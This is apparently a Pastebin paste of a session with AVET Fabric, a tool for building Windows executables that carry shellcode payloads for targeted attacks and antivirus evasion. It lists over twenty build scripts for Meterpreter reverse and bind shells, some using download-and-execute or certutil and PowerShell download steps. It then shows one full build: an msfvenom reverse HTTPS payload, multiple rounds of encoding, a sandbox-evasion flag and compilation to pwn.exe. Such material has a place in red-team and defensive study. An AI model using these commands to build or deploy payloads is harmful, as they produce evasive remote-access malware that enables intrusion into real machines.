Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .| , +
- * | | (( *
- |'| ` ._____
- + ___ | | * |. |' .---"|
- _ .-' '-. | | .--'| || | _| |
- .-'| _.| | || '-__ | | | || |
- |' | |. | || | | | | || |
- ___| '-' ' "" '-' '-.' '` |____
- jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- AVET Fabric by Daniel Sauder
- avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.
- 0: build_win32_meterpreter_rev_https_shikata_fopen.sh
- 1: build_win32_meterpreter_rev_https_fopen_shikata.sh
- 2: buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh
- 3: build_win32_meterpreter_rev_https_50xshikata_quiet.sh
- 4: build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh
- 5: build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh
- 6: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh
- 7: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
- 8: build_win32_meterpreter_rev_https_ASCIIMSF.sh
- 9: build_win32_meterpreter_rev_https_killswitch_shikata.sh
- 10: build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh
- 11: build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
- 12: build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh
- 13: build_win32_meterpreter_rev_https_50xshikata.sh
- 14: build_win32_meterpreter_rev_https_shikata_loadfile.sh
- 15: build_win32_meterpreter_unstaged_rev_https_40xshikata.sh
- 16: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh
- 17: build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh
- 18: build_win64_meterpreter_rev_tcp_xor.sh
- 19: build_win32_meterpreter_rev_https_shikata_load_ie.sh
- 20: build_win64_meterpreter_rev_tcp_xor_downloadexecshellcode.sh
- 21: build_win64_meterpreter_rev_tcp_xor_fopen.sh
- Input number of the script you want use and hit enter: 0
- Now you can edit the build script line by line.
- simple example script for building the .exe file
- include script containing the compiler var $win32_compiler
- you can edit the compiler in build/global_win32.sh
- or enter $win32_compiler="mycompiler" here
- $ . build/global_win32.sh
- import global default lhost and lport values from build/global_connect_config.sh
- $ . build/global_connect_config.sh
- override connect-back settings here, if necessary
- $ LPORT=$GLOBAL_LPORT
- $ LHOST=$GLOBAL_LHOST
- make meterpreter reverse payload, encoded with shikata_ga_nai
- additionaly to the avet encoder, further encoding should be used
- $ msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
- format the shellcode for make_avet
- $ ./format.sh sc.txt > scclean.txt && rm sc.txt
- call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion
- $ ./make_avet -f scclean.txt -F -E
- compile to pwn.exe file
- $ $win32_compiler -o pwn.exe avet.c
- cleanup
- $ rm scclean.txt && echo "" > defs.h
- The following commands will be executed:
- #/bin/bash
- . build/global_win32.sh
- . build/global_connect_config.sh
- LPORT=$GLOBAL_LPORT
- LHOST=$GLOBAL_LHOST
- msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
- ./format.sh sc.txt > scclean.txt && rm sc.txt
- ./make_avet -f scclean.txt -F -E
- $win32_compiler -o pwn.exe avet.c
- rm scclean.txt && echo "" > defs.h
- Press enter to continue.
- Building the output file...
- Please stand by...
- The output file should be placed in the current directory.
- Bye...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement